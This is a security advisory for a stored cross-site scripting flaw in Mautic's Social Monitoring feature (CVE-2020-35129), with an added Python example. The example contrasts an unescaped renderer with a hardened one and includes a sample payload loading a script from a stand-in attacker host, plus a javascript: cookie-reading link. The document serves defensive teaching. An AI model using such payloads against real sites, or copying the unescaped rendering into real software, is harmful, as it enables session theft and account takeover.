PT-2021-11713 · Mautic · Mautic

Dardan Prebreza · Published 2021-01-19 · Updated 2022-05-24 · CVE-2020-35129

CVSS v3.1: 9.0 (Critical)
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: Mautic versions prior to 3.2.4
Description: An authenticated user with access to Mautic's Social Monitoring feature can store a payload that is later rendered to other users, including administrators, and executes in their browsers as stored XSS (the CVSS vector reflects this: low privileges required, user interaction by the victim, scope changed). The payload can load an externally hosted JavaScript file, which then runs with the victim's session and could change the victim's password or email address, or elevate the attacker's own account from a low-privileged user to an administrator.
Recommendations: For versions prior to 3.2.4, update to version 3.2.4 or later. As a temporary workaround, restrict access to the Social Monitoring feature to trusted users only, which removes the low-privileged attacker's ability to store the payload.
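The following is an added illustration of the bug class behind this advisory, not Mautic's own code: it models a Social Monitoring view that renders monitored posts (attacker-controlled text and a profile link) to other users. The record layout, field names and the `attacker.example` host in the sample payload are assumptions; the unsafe renderer shows how a stored `<script src=...>` tag reaches the victim's browser, and the hardened renderer escapes per HTML context and neutralises non-http(s) link schemes.

```python
"""Stored-XSS pattern from the Mautic advisory, modelled on a made-up
'social monitoring' view. This is an added example, not Mautic's code.
The post structure and field names are assumptions."""
import html
from urllib.parse import urlsplit

# Constructed sample records. The second one carries the external-script
# payload described in the advisory (host name is made up).
SAMPLE_POSTS = [
    {"author": "alice",
     "text": "Loving the new release!",
     "profile_url": "https://social.example/alice"},
    {"author": "mallory",
     "text": '<script src="https://attacker.example/x.js"></script>',
     "profile_url": "javascript:alert(document.cookie)"},
]


def render_unsafe(post: dict) -> str:
    """Vulnerable: untrusted fields are interpolated into HTML unescaped,
    so whoever views the monitoring page runs the stored script."""
    return (f'<div class="post"><a href="{post["profile_url"]}">'
            f'{post["author"]}</a>: {post["text"]}</div>')


def safe_url(url: str) -> str:
    """Allow only http(s) link targets; javascript:, data: and friends
    become an inert anchor instead of a clickable payload."""
    url = url.strip()
    scheme = urlsplit(url).scheme.lower()
    return url if scheme in ("http", "https") else "#"


def render_safe(post: dict) -> str:
    """Hardened: escape for element-body and attribute contexts (quote=True
    escapes both quote characters) and sanitise the URL before it is used
    in an href attribute."""
    author = html.escape(post["author"], quote=True)
    text = html.escape(post["text"], quote=True)
    href = html.escape(safe_url(post["profile_url"]), quote=True)
    return f'<div class="post"><a href="{href}">{author}</a>: {text}</div>'


def contains_active_content(rendered: str) -> bool:
    """Crude post-render check: does the HTML still carry a live script
    tag or a javascript: link? Useful as a regression test for templates."""
    low = rendered.lower()
    return "<script" in low or 'href="javascript:' in low


if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print("unsafe:", render_unsafe(post))
        print("safe:  ", render_safe(post))
```

Running the block prints both renderings for each post; the attacker's record keeps a working `<script>` tag and `javascript:` link only in the unsafe output. In a real template engine the same effect is obtained by leaving auto-escaping on and never using a raw/unescaped filter on monitored content.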

Fix

XSS


Weakness Enumeration

Related Identifiers

CVE-2020-35129
GHSA-3PX5-WJH3-9X6R

Affected Products

Mautic